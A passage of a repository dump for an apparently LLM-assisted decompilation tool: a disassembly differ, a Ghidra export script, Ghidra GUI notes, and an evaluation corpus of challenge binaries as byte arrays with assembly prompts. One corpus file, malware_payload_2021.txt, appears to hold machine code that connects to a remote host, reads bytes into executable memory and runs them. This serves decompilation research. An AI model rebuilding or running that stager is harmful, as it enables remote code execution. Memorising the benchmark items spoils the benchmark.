8 | def diff_all(disasm, target): 9 | """Diff two disassembly maps""" 10 | names = set() 11 | names.update(disasm.keys()) 12 | names.update(target.keys()) 13 | 14 | result = {} 15 | deltas = [0, 0, 0, 0] 16 | 17 | for name in names: 18 | if name not in disasm: 19 | t = target[name]['asm'] 20 | n = nlines(t) 21 | hunks = [[1, t, n]] 22 | delta = [0, 0, n, n] 23 | srcmap = [] 24 | elif name not in target: 25 | d = disasm[name]['asm'] 26 | n = nlines(d) 27 | hunks = [[-1, d, n]] 28 | delta = [n, 0, 0, n] 29 | srcmap = disasm[name].get('map', []) 30 | else: 31 | t = target[name]['asm'] 32 | d = disasm[name]['asm'] 33 | hunks, delta = diff_one(d, t) 34 | srcmap = disasm[name].get('map', []) 35 | 36 | for i in range(4): 37 | deltas[i] += delta[i] 38 | 39 | result[name] = { 40 | 'hunks': hunks, 41 | 'delta': delta, 42 | 'srcmap': srcmap 43 | } 44 | 45 | return result, deltas 46 | 47 | def diff_one(disasm, target): 48 | """Diff two text blocks of disassembly""" 49 | d, t, map = dmp.diff_linesToChars(disasm, target) 50 | diffs = dmp.diff_main(d, t, False) 51 | dmp.diff_charsToLines(diffs, map) 52 | 53 | delta = [0, 0, 0, 0] 54 | hunks = [] 55 | for diff in diffs: 56 | n = diff[1].count('\n') 57 | hunks.append([diff[0], diff[1], n]) 58 | 59 | delta[diff[0] + 1] += n 60 | delta[3] += n 61 | 62 | return hunks, delta 63 | 64 | def nlines(text): 65 | """Count the number of lines in a text block""" 66 | n = text.count('\n') 67 | if not text.endswith('\n'): 68 | n += 1 69 | return n 70 | 71 | 72 | def print_yaml(disasm, stream=sys.stdout): 73 | from yaml import Dumper 74 | dumper = Dumper(stream) 75 | 76 | # Force a Git-friendly output format: 77 | # https://stackoverflow.com/a/8641732 78 | def strdump(dumper, data): 79 | return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') 80 | dumper.add_representer(str, strdump) 81 | 82 | dumper.open() 83 | dumper.represent(disasm) 84 | dumper.close() 85 | 86 | def get_disasm(binary_path, language, func_name): 87 | binary = Binary(binary_path, language) 88 | disasm = binary.disassemble([func_name], None) 89 | 90 | return disasm -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/differ.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | 3 | from diff_match_patch import diff_match_patch 4 | dmp = diff_match_patch() 5 | 6 | def diff_all(disasm, target): 7 | """Diff two disassembly maps""" 8 | names = set() 9 | names.update(disasm.keys()) 10 | names.update(target.keys()) 11 | 12 | result = {} 13 | deltas = [0, 0, 0, 0] 14 | 15 | for name in names: 16 | if name not in disasm: 17 | t = target[name]['asm'] 18 | n = nlines(t) 19 | hunks = [[1, t, n]] 20 | delta = [0, 0, n, n] 21 | srcmap = [] 22 | elif name not in target: 23 | d = disasm[name]['asm'] 24 | n = nlines(d) 25 | hunks = [[-1, d, n]] 26 | delta = [n, 0, 0, n] 27 | srcmap = disasm[name].get('map', []) 28 | else: 29 | t = target[name]['asm'] 30 | d = disasm[name]['asm'] 31 | hunks, delta = diff_one(d, t) 32 | srcmap = disasm[name].get('map', []) 33 | 34 | for i in range(4): 35 | deltas[i] += delta[i] 36 | 37 | result[name] = { 38 | 'hunks': hunks, 39 | 'delta': delta, 40 | 'srcmap': srcmap 41 | } 42 | 43 | return result, deltas 44 | 45 | def diff_one(disasm, target): 46 | """Diff two text blocks of disassembly""" 47 | d, t, map = dmp.diff_linesToChars(disasm, target) 48 | diffs = dmp.diff_main(d, t, False) 49 | dmp.diff_charsToLines(diffs, map) 50 | 51 | delta = [0, 0, 0, 0] 52 | hunks = [] 53 | for diff in diffs: 54 | n = diff[1].count('\n') 55 | hunks.append([diff[0], diff[1], n]) 56 | 57 | delta[diff[0] + 1] += n 58 | delta[3] += n 59 | 60 | return hunks, delta 61 | 62 | def nlines(text): 63 | """Count the number of lines in a text block""" 64 | n = text.count('\n') 65 | if not text.endswith('\n'): 66 | n += 1 67 | return n 68 | 69 | 70 | if __name__ == '__main__': 71 | import argparse 72 | import yaml 73 | import sys 74 | 75 | def read_yaml(path): 76 | with open(path) as file: 77 | return yaml.safe_load(file) 78 | 79 | parser = argparse.ArgumentParser() 80 | parser.add_argument('disasm', help='path to the YAML disassembly of a candidate binary') 81 | parser.add_argument('target', help='path to the YAML disassembly of the target binary') 82 | 83 | args = parser.parse_args() 84 | disasm = read_yaml(args.disasm) 85 | target = read_yaml(args.target) 86 | 87 | # Force a Git-friendly output format: 88 | # https://stackoverflow.com/a/8641732 89 | def strdump(dumper, data): 90 | return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') 91 | yaml.add_representer(str, strdump) 92 | 93 | functions, _ = diff_all(disasm, target) 94 | sys.stdout.write(yaml.dump(functions)) 95 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/disassembler.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | 3 | import fnmatch 4 | import re 5 | import sys 6 | 7 | from binary import Binary 8 | 9 | def print_text(disasm, stream=sys.stdout): 10 | for name, info in disasm.items(): 11 | stream.write(info['asm']) 12 | stream.write('\n') 13 | 14 | def print_yaml(disasm, stream=sys.stdout): 15 | from yaml import Dumper 16 | dumper = Dumper(stream) 17 | 18 | # Force a Git-friendly output format: 19 | # https://stackoverflow.com/a/8641732 20 | def strdump(dumper, data): 21 | return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') 22 | dumper.add_representer(str, strdump) 23 | 24 | dumper.open() 25 | dumper.represent(disasm) 26 | dumper.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | import argparse 31 | 32 | parser = argparse.ArgumentParser() 33 | parser.add_argument('-l', '--language', help='the original source language', required=True) 34 | parser.add_argument('-s', '--srcmap', help='include line numbers from the debug info', action='store_true') 35 | parser.add_argument('-y', '--yaml', help='produce YAML output instead of plaintext', action='store_true') 36 | parser.add_argument('binary', help='path to an ELF binary to disassemble') 37 | parser.add_argument('patterns', help='function names (glob patterns)', nargs='+') 38 | 39 | args = parser.parse_args() 40 | binary = Binary(args.binary, args.language) 41 | disasm = binary.disassemble(args.patterns, args.srcmap) 42 | 43 | if args.yaml: 44 | print_yaml(disasm) 45 | else: 46 | print_text(disasm) 47 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/requirements.txt: -------------------------------------------------------------------------------- 1 | capstone 2 | diff_match_patch 3 | intervaltree 4 | pyelftools 5 | pyyaml 6 | -------------------------------------------------------------------------------- /compiler/pseudoexport.py: -------------------------------------------------------------------------------- 1 | # This ghidra headless script allows you to export the ghidra pseudocode of a function 2 | from ghidra.program.model.symbol import SymbolType 3 | from ghidra.app.decompiler import DecompInterface 4 | import os 5 | 6 | name = os.environ['FUNC_NAME'] 7 | filename = name.replace(":","_") 8 | 9 | output_path = os.environ['PSEUDOCODE_OUTPUT_PATH'] 10 | program_name = currentProgram.getName() 11 | full_path = os.path.join(output_path, program_name + "_" + filename + ".txt") 12 | 13 | symbolTable = currentProgram.getSymbolTable() 14 | 15 | symbols = symbolTable.getSymbolIterator() 16 | 17 | for symbol in symbols: 18 | if symbol.getSymbolType() == SymbolType.FUNCTION: 19 | print(symbol.getName(True)) 20 | if symbol.getName(True) == name: 21 | print("Found function!") 22 | function = getFunctionAt(symbol.getAddress()) 23 | decompInterface = DecompInterface() 24 | decompInterface.openProgram(currentProgram) 25 | results = decompInterface.decompileFunction(function, 0, None) 26 | functionCode = results.getDecompiledFunction().getC() 27 | f = open(full_path, "w") 28 | f.write(functionCode) 29 | f.close() 30 | -------------------------------------------------------------------------------- /docs/GhidraGUI.md: -------------------------------------------------------------------------------- 1 | # Ghidra GUI Notes 2 | This file is to provide some information about how to create GUI components in Ghidra from the plugin standpoint. When creating this plugin, there was no information about this online. Thus, I feel that it is important to provide this to the community to assist in plugin development. 3 | Note: the code examples will be shown in Jython, but the classes and methods referenced should work for Java plugins as well. 4 | 5 | ## [PluginTool](https://ghidra.re/ghidra_docs/api/ghidra/framework/plugintool/PluginTool.html) 6 | The PluginTool is a class that allows a developer to manage and interact with plugins within the Ghidra environment. An instance of this class can be accessed by calling: 7 | ```python 8 | currentTool = state.getTool() 9 | ``` 10 | Using this instance, we can add ComponentProviders which are objects that "provide" a visual component or representation for a plugin. Here is the code for adding a ComponentProvider. 11 | ```python 12 | currentTool = state.getTool() 13 | #The second parameter is if the ComponentProvider should be visible or not. 14 | currentTool.addComponentProvider(currentProvider, True) 15 | ``` 16 | ## [ComponentProviderAdapter](https://ghidra.re/ghidra_docs/api/ghidra/framework/plugintool/ComponentProviderAdapter.html) 17 | The ComponentProviderAdapter is a class that extends the ComponentProvider class such that a GUI component can be properly added. You have to create a subclass of this class to implement the functionality and the GUI for your plugin. For its GUI, Ghidra makes use of the javax.swing library and all of its swing components. Thus, you have to override the constructor to create the right GUI components. You also need to override the getComponent() method to return the right GUI component that you want to display. Here is a simple example: 18 | ```python 19 | class SimpleComponentProviderAdapter(ComponentProviderAdapter): 20 | def __init__(self, tool, name): 21 | #Call default constructor with plugin name and the current PluginTool object 22 | ComponentProviderAdapter.__init__(self, tool, name, name) 23 | #Create an editable javax.swing textarea 24 | self.textArea = JTextArea(10, 80) 25 | self.textArea.setEditable(True) 26 | self.textArea.setLineWrap(True) 27 | #Set the position of the component to the right 28 | self.setDefaultWindowPosition(WindowPosition.RIGHT) 29 | #Set title of component 30 | self.setTitle("OpenAI Pseudocode") 31 | #Set component to be visible 32 | self.setVisible(True) 33 | 34 | def getComponent(self): 35 | return self.textArea 36 | ``` 37 | ## [DockingAction](https://ghidra.re/ghidra_docs/api/docking/action/DockingAction.html) 38 | The DockingAction is a class that represents the action associated with a particular menu or toolbar item. You can create a subclass of the DockingAction superclass and then define your own custom action or menu item. An instance of this subclass can be then added to a ComponentProviderAdapter object. In the DockingAction subclass, you must override the actionPerformed method which defines the code that will run when the menu item is triggered. You can associate an icon and keybinding with particular DockingAction objects. Here is a simple example: 39 | ```python 40 | class SimpleDockingAction(DockingAction): 41 | def __init__(self, owner): 42 | #Pass owner and tooltip to superclass constructor 43 | DockingAction.__init__(self, "Tooltip for action", owner, False) 44 | self.markHelpUnnecessary() 45 | #Enable the DockingAction 46 | self.setEnabled(True) 47 | #Load and set an icon for the DockingAction 48 | icon = ResourceManager.loadImage("images/edit-cut.png") 49 | self.setToolBarData(ToolBarData(icon)) 50 | 51 | #Override the actionPerformed method 52 | def actionPerformed(self, actionContext): 53 | print("Overridden!") 54 | ``` 55 | ## Conclusion 56 | With this information, you should now be able to create GUI components for your plugin. For more complex GUI components and styles, all you have to do is to modify the java swing code inside the overridden ComponentProviderAdapter class. 57 | -------------------------------------------------------------------------------- /eval/README.md: -------------------------------------------------------------------------------- 1 | # Decompilation Evaluation/Scoring Tool 2 | This folder contains all the code for the decompilation scoring tool which calculates for any given decompilation output how accurate it is compared to the original source. 3 | The scoring of decompilation is done by parsing the decompilation and determining the number of function calls and branches. 4 | # eval.py 5 | This file contains the main code for the tool. The tool can be used as follows: 6 | ```bash 7 | python3 eval.py -d PATH_TO_DISASSEMBLY_FILES -s PATH_TO_SOURCE_FILES -l LANGUAGE 8 | ``` 9 | Here is the full help description of the tool: 10 | ```bash 11 | usage: Pseudocode Evaluator [-h] -d DISASM -s SOURCE -l LANGUAGE 12 | 13 | This program evaluates the accuracy of decompiled code compared to its disassembly. 14 | 15 | options: 16 | -h, --help show this help message and exit 17 | -d DISASM, --disasm DISASM 18 | Specify the directory to disassembly files. 19 | -s SOURCE, --source SOURCE 20 | Specify the directory to decompilation source files. 21 | -l LANGUAGE, --language LANGUAGE 22 | Specify the language (C, CPP, Rust, Go) of decompilation files. 23 | ``` 24 | The eval functions from the eval.py are used in the benchmark tool as a scoring method. 25 | ## extract_type.py 26 | This file is a script such that given a JSON file (Ex: [cpp_types.json](https://github.com/tree-sitter/tree-sitter-cpp/blob/master/src/node-types.json)) from the tree-sitter library of the types in AST, it can determine the unique types of the AST. 27 | ## *_corpus folders 28 | The c_corpus, cpp_corpus, rust_corpus, and go_corpus subfolders themselves have subfolders named prompts, disasm, and source which contain the prompts, disassembly, and source of binaries from the Decompetition challenges. 29 | The data from these folders can be used with the benchmarking and compiler augmented generation tool as well. 30 | Here are links to the code from the challenges: 31 | [Challenges 2020](https://github.com/decompetition/challenges-2020) 32 | [Challenges 2021](https://github.com/decompetition/challenges-2021) 33 | -------------------------------------------------------------------------------- /eval/c_corpus/disasm/baby_c_main_2021.txt: -------------------------------------------------------------------------------- 1 | [243, 15, 30, 250, 85, 72, 137, 229, 83, 72, 131, 236, 24, 198, 69, 235, 1, 72, 139, 5, 63, 46, 0, 0, 72, 137, 199, 232, 215, 254, 255, 255, 137, 69, 236, 131, 125, 236, 255, 15, 132, 132, 0, 0, 0, 232, 213, 254, 255, 255, 72, 139, 0, 139, 85, 236, 72, 99, 210, 72, 1, 210, 72, 1, 208, 15, 183, 0, 15, 183, 192, 37, 0, 32, 0, 0, 133, 192, 116, 26, 72, 139, 21, 240, 45, 0, 0, 139, 69, 236, 72, 137, 214, 137, 199, 232, 115, 254, 255, 255, 198, 69, 235, 1, 235, 167, 128, 125, 235, 0, 116, 33, 72, 139, 29, 208, 45, 0, 0, 139, 69, 236, 137, 199, 232, 70, 254, 255, 255, 72, 137, 222, 137, 199, 232, 76, 254, 255, 255, 198, 69, 235, 0, 235, 128, 72, 139, 29, 175, 45, 0, 0, 139, 69, 236, 137, 199, 232, 69, 254, 255, 255, 72, 137, 222, 137, 199, 232, 43, 254, 255, 255, 233, 96, 255, 255, 255, 144, 184, 0, 0, 0, 0, 72, 131, 196, 24, 91, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/demesne_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 96, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 131, 125, 248, 2, 15, 141, 29, 0, 0, 0, 72, 191, 4, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 79, 254, 255, 255, 199, 69, 252, 255, 255, 255, 255, 233, 239, 0, 0, 0, 72, 139, 69, 240, 72, 139, 120, 8, 49, 192, 137, 198, 49, 210, 232, 80, 254, 255, 255, 137, 69, 236, 72, 141, 125, 192, 49, 246, 186, 32, 0, 0, 0, 232, 45, 254, 255, 255, 199, 69, 188, 0, 0, 0, 0, 131, 125, 188, 16, 15, 141, 177, 0, 0, 0, 72, 141, 125, 192, 49, 246, 186, 32, 0, 0, 0, 232, 12, 254, 255, 255, 139, 69, 236, 51, 69, 188, 137, 69, 184, 72, 141, 125, 184, 232, 26, 255, 255, 255, 137, 69, 180, 139, 69, 180, 185, 5, 0, 0, 0, 153, 247, 249, 131, 194, 5, 137, 85, 176, 199, 69, 172, 0, 0, 0, 0, 139, 69, 172, 59, 69, 176, 15, 141, 50, 0, 0, 0, 72, 141, 125, 184, 232, 234, 254, 255, 255, 137, 69, 168, 139, 69, 168, 185, 26, 0, 0, 0, 153, 247, 249, 131, 194, 97, 136, 209, 72, 99, 69, 172, 136, 76, 5, 192, 139, 69, 172, 131, 192, 1, 137, 69, 172, 233, 194, 255, 255, 255, 72, 141, 125, 192, 72, 190, 28, 32, 64, 0, 0, 0, 0, 0, 232, 174, 253, 255, 255, 72, 141, 117, 192, 72, 191, 33, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 105, 253, 255, 255, 139, 69, 188, 131, 192, 1, 137, 69, 188, 233, 69, 255, 255, 255, 199, 69, 252, 0, 0, 0, 0, 139, 69, 252, 72, 131, 196, 96, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/dublin_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 64, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 72, 199, 69, 232, 0, 0, 0, 0, 72, 199, 69, 224, 0, 0, 0, 0, 72, 199, 69, 216, 0, 0, 0, 0, 72, 199, 69, 208, 0, 0, 0, 0, 72, 199, 69, 200, 0, 0, 0, 0, 199, 69, 196, 0, 0, 0, 0, 72, 191, 32, 32, 64, 0, 0, 0, 0, 0, 72, 141, 117, 196, 176, 0, 232, 22, 253, 255, 255, 131, 248, 1, 15, 132, 5, 0, 0, 0, 233, 77, 1, 0, 0, 233, 0, 0, 0, 0, 49, 192, 72, 131, 125, 208, 0, 136, 69, 195, 15, 132, 16, 0, 0, 0, 72, 139, 69, 208, 139, 64, 8, 59, 69, 196, 15, 159, 192, 136, 69, 195, 138, 69, 195, 168, 1, 15, 133, 5, 0, 0, 0, 233, 50, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 200, 72, 139, 69, 216, 72, 137, 69, 208, 72, 131, 125, 216, 0, 15, 132, 18, 0, 0, 0, 72, 139, 69, 216, 72, 139, 0, 72, 139, 77, 200, 72, 49, 200, 72, 137, 69, 216, 233, 158, 255, 255, 255, 233, 0, 0, 0, 0, 49, 192, 72, 131, 125, 208, 0, 136, 69, 194, 15, 132, 16, 0, 0, 0, 72, 139, 69, 208, 139, 64, 8, 59, 69, 196, 15, 156, 192, 136, 69, 194, 138, 69, 194, 168, 1, 15, 133, 5, 0, 0, 0, 233, 50, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 216, 72, 139, 69, 200, 72, 137, 69, 208, 72, 131, 125, 200, 0, 15, 132, 18, 0, 0, 0, 72, 139, 69, 200, 72, 139, 0, 72, 139, 77, 216, 72, 49, 200, 72, 137, 69, 200, 233, 158, 255, 255, 255, 72, 131, 125, 208, 0, 15, 132, 53, 0, 0, 0, 72, 139, 69, 208, 139, 64, 8, 59, 69, 196, 15, 143, 8, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 216, 72, 139, 69, 208, 139, 64, 8, 59, 69, 196, 15, 142, 8, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 200, 233, 0, 0, 0, 0, 139, 125, 196, 72, 139, 117, 216, 72, 139, 85, 200, 232, 234, 252, 255, 255, 72, 137, 69, 208, 72, 131, 125, 216, 0, 15, 133, 8, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 232, 72, 131, 125, 200, 0, 15, 133, 8, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 224, 233, 137, 254, 255, 255, 72, 131, 125, 232, 0, 15, 132, 83, 0, 0, 0, 72, 131, 125, 224, 0, 15, 132, 72, 0, 0, 0, 72, 191, 35, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 116, 251, 255, 255, 72, 139, 125, 232, 72, 190, 45, 32, 64, 0, 0, 0, 0, 0, 232, 17, 253, 255, 255, 72, 191, 54, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 80, 251, 255, 255, 72, 139, 125, 224, 72, 190, 64, 32, 64, 0, 0, 0, 0, 0, 232, 237, 252, 255, 255, 49, 192, 72, 131, 196, 64, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/leipzig_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 32, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 131, 125, 248, 2, 15, 132, 35, 0, 0, 0, 72, 139, 60, 37, 160, 64, 64, 0, 72, 190, 8, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 39, 253, 255, 255, 191, 6, 0, 0, 0, 232, 205, 252, 255, 255, 72, 199, 4, 37, 184, 64, 64, 0, 0, 0, 0, 0, 72, 139, 69, 240, 72, 139, 120, 8, 232, 52, 253, 255, 255, 72, 152, 72, 137, 4, 37, 176, 64, 64, 0, 72, 131, 60, 37, 176, 64, 64, 0, 1, 15, 141, 35, 0, 0, 0, 72, 139, 60, 37, 160, 64, 64, 0, 72, 190, 15, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 210, 252, 255, 255, 191, 6, 0, 0, 0, 232, 120, 252, 255, 255, 191, 10, 0, 0, 0, 72, 190, 208, 18, 64, 0, 0, 0, 0, 0, 232, 164, 252, 255, 255, 191, 12, 0, 0, 0, 72, 190, 112, 18, 64, 0, 0, 0, 0, 0, 232, 144, 252, 255, 255, 191, 21, 0, 0, 0, 72, 190, 192, 17, 64, 0, 0, 0, 0, 0, 232, 124, 252, 255, 255, 191, 22, 0, 0, 0, 72, 190, 32, 18, 64, 0, 0, 0, 0, 0, 232, 104, 252, 255, 255, 232, 51, 252, 255, 255, 137, 69, 236, 72, 191, 192, 64, 64, 0, 0, 0, 0, 0, 190, 1, 0, 0, 0, 232, 156, 252, 255, 255, 137, 69, 232, 131, 125, 232, 0, 15, 133, 7, 0, 0, 0, 199, 69, 232, 21, 0, 0, 0, 139, 125, 236, 139, 117, 232, 232, 77, 252, 255, 255, 139, 69, 252, 72, 131, 196, 32, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/malware_payload_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 32, 191, 2, 0, 0, 0, 190, 1, 0, 0, 0, 49, 210, 232, 71, 254, 255, 255, 137, 69, 252, 72, 191, 4, 32, 64, 0, 0, 0, 0, 0, 232, 181, 253, 255, 255, 137, 69, 236, 102, 199, 69, 232, 2, 0, 191, 184, 34, 0, 0, 232, 98, 253, 255, 255, 102, 137, 69, 234, 139, 125, 252, 72, 141, 117, 232, 186, 16, 0, 0, 0, 232, 253, 253, 255, 255, 131, 248, 0, 15, 141, 25, 0, 0, 0, 72, 191, 14, 32, 64, 0, 0, 0, 0, 0, 232, 245, 254, 255, 255, 191, 4, 0, 0, 0, 232, 203, 253, 255, 255, 49, 192, 65, 137, 193, 190, 0, 16, 0, 0, 186, 7, 0, 0, 0, 185, 34, 0, 0, 0, 65, 184, 255, 255, 255, 255, 76, 137, 207, 232, 249, 252, 255, 255, 72, 137, 69, 224, 139, 125, 252, 72, 139, 117, 224, 186, 0, 4, 0, 0, 232, 36, 253, 255, 255, 72, 131, 248, 0, 15, 141, 25, 0, 0, 0, 72, 191, 33, 32, 64, 0, 0, 0, 0, 0, 232, 155, 254, 255, 255, 191, 5, 0, 0, 0, 232, 113, 253, 255, 255, 72, 191, 45, 32, 64, 0, 0, 0, 0, 0, 232, 130, 254, 255, 255, 176, 0, 255, 85, 224, 49, 192, 72, 131, 196, 32, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/rotterdam_reed_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 129, 236, 176, 0, 0, 0, 137, 125, 252, 72, 137, 117, 240, 72, 141, 189, 112, 255, 255, 255, 72, 190, 80, 32, 64, 0, 0, 0, 0, 0, 186, 128, 0, 0, 0, 232, 147, 253, 255, 255, 199, 133, 104, 255, 255, 255, 0, 0, 0, 0, 199, 133, 100, 255, 255, 255, 0, 0, 0, 0, 139, 125, 252, 72, 139, 117, 240, 72, 141, 141, 112, 255, 255, 255, 72, 186, 24, 32, 64, 0, 0, 0, 0, 0, 76, 141, 133, 108, 255, 255, 255, 232, 43, 253, 255, 255, 137, 133, 96, 255, 255, 255, 131, 189, 96, 255, 255, 255, 0, 15, 141, 5, 0, 0, 0, 233, 219, 0, 0, 0, 139, 133, 96, 255, 255, 255, 137, 133, 92, 255, 255, 255, 131, 232, 63, 15, 132, 178, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 92, 255, 255, 255, 131, 232, 100, 15, 132, 60, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 92, 255, 255, 255, 131, 232, 101, 15, 132, 25, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 92, 255, 255, 255, 131, 232, 107, 15, 132, 35, 0, 0, 0, 233, 118, 0, 0, 0, 199, 133, 104, 255, 255, 255, 0, 0, 0, 0, 233, 113, 0, 0, 0, 199, 133, 104, 255, 255, 255, 1, 0, 0, 0, 233, 98, 0, 0, 0, 72, 139, 60, 37, 104, 64, 64, 0, 232, 146, 254, 255, 255, 137, 133, 100, 255, 255, 255, 131, 189, 100, 255, 255, 255, 1, 15, 140, 13, 0, 0, 0, 131, 189, 100, 255, 255, 255, 25, 15, 142, 28, 0, 0, 0, 72, 139, 52, 37, 104, 64, 64, 0, 72, 191, 29, 32, 64, 0, 0, 0, 0, 0, 232, 219, 253, 255, 255, 233, 5, 0, 0, 0, 233, 20, 0, 0, 0, 233, 0, 0, 0, 0, 233, 0, 0, 0, 0, 191, 1, 0, 0, 0, 232, 29, 252, 255, 255, 233, 233, 254, 255, 255, 131, 189, 100, 255, 255, 255, 0, 15, 133, 35, 0, 0, 0, 191, 2, 0, 0, 0, 72, 190, 43, 32, 64, 0, 0, 0, 0, 0, 186, 14, 0, 0, 0, 232, 2, 252, 255, 255, 191, 1, 0, 0, 0, 232, 232, 251, 255, 255, 131, 189, 104, 255, 255, 255, 0, 15, 132, 17, 0, 0, 0, 184, 26, 0, 0, 0, 43, 133, 100, 255, 255, 255, 137, 133, 100, 255, 255, 255, 139, 133, 100, 255, 255, 255, 72, 129, 196, 176, 0, 0, 0, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/winkey_check_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 80, 72, 137, 125, 240, 72, 141, 125, 234, 49, 246, 186, 6, 0, 0, 0, 232, 164, 254, 255, 255, 72, 141, 125, 230, 49, 246, 186, 4, 0, 0, 0, 232, 148, 254, 255, 255, 72, 141, 125, 222, 49, 246, 186, 8, 0, 0, 0, 232, 132, 254, 255, 255, 72, 141, 125, 216, 49, 246, 186, 6, 0, 0, 0, 232, 116, 254, 255, 255, 72, 139, 125, 240, 72, 141, 85, 234, 72, 141, 77, 230, 76, 141, 69, 222, 76, 141, 77, 216, 72, 190, 4, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 111, 254, 255, 255, 72, 141, 125, 234, 232, 38, 254, 255, 255, 72, 131, 248, 5, 15, 133, 57, 0, 0, 0, 72, 141, 125, 230, 232, 19, 254, 255, 255, 72, 131, 248, 3, 15, 133, 38, 0, 0, 0, 72, 141, 125, 222, 232, 0, 254, 255, 255, 72, 131, 248, 7, 15, 133, 19, 0, 0, 0, 72, 141, 125, 216, 232, 237, 253, 255, 255, 72, 131, 248, 5, 15, 132, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 87, 1, 0, 0, 72, 141, 125, 234, 72, 190, 20, 32, 64, 0, 0, 0, 0, 0, 72, 141, 85, 212, 72, 141, 77, 208, 176, 0, 232, 250, 253, 255, 255, 131, 125, 212, 1, 15, 140, 13, 0, 0, 0, 129, 125, 212, 110, 1, 0, 0, 15, 142, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 23, 1, 0, 0, 131, 125, 208, 3, 15, 142, 22, 0, 0, 0, 131, 125, 208, 95, 15, 141, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 247, 0, 0, 0, 72, 141, 125, 230, 190, 27, 32, 64, 0, 232, 153, 253, 255, 255, 131, 248, 0, 15, 132, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 212, 0, 0, 0, 15, 190, 125, 222, 232, 139, 254, 255, 255, 131, 248, 0, 15, 133, 36, 0, 0, 0, 15, 190, 125, 229, 232, 121, 254, 255, 255, 131, 248, 0, 15, 132, 18, 0, 0, 0, 15, 190, 125, 229, 232, 103, 254, 255, 255, 131, 248, 8, 15, 142, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 146, 0, 0, 0, 15, 190, 125, 223, 232, 73, 254, 255, 255, 137, 69, 184, 15, 190, 125, 224, 232, 61, 254, 255, 255, 137, 193, 139, 69, 184, 1, 200, 137, 69, 188, 15, 190, 125, 225, 232, 42, 254, 255, 255, 137, 193, 139, 69, 188, 1, 200, 137, 69, 192, 15, 190, 125, 226, 232, 23, 254, 255, 255, 137, 193, 139, 69, 192, 1, 200, 137, 69, 196, 15, 190, 125, 227, 232, 4, 254, 255, 255, 137, 193, 139, 69, 196, 1, 200, 137, 69, 200, 15, 190, 125, 228, 232, 241, 253, 255, 255, 137, 193, 139, 69, 200, 1, 200, 137, 69, 204, 139, 69, 204, 185, 7, 0, 0, 0, 153, 247, 249, 131, 250, 0, 15, 132, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 7, 0, 0, 0, 199, 69, 252, 0, 0, 0, 0, 139, 69, 252, 72, 131, 196, 80, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/prompts/baby_c_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcA(): 4 | ENDBR64 5 | PUSH RBP 6 | MOV RBP,RSP 7 | PUSH RBX 8 | SUB RSP,0x18 9 | MOV byte ptr [RBP + -0x15],0x1 10 | LAB_001011da: 11 | MOV RAX,qword ptr [stdin] 12 | MOV RDI,RAX 13 | CALL getc 14 | MOV dword ptr [RBP + -0x14],EAX 15 | CMP dword ptr [RBP + -0x14],-0x1 16 | JZ LAB_0010127a 17 | CALL __ctype_b_loc 18 | MOV RAX,qword ptr [RAX] 19 | MOV EDX,dword ptr [RBP + -0x14] 20 | MOVSXD RDX,EDX 21 | ADD RDX,RDX 22 | ADD RAX,RDX 23 | MOVZX EAX,word ptr [RAX] 24 | MOVZX EAX,AX 25 | AND EAX,0x2000 26 | TEST EAX,EAX 27 | JZ LAB_00101233 28 | MOV RDX,qword ptr [stdout] 29 | MOV EAX,dword ptr [RBP + -0x14] 30 | MOV RSI,RDX 31 | MOV EDI,EAX 32 | CALL putc 33 | MOV byte ptr [RBP + -0x15],0x1 34 | JMP LAB_001011da 35 | LAB_00101233: 36 | CMP byte ptr [RBP + -0x15],0x0 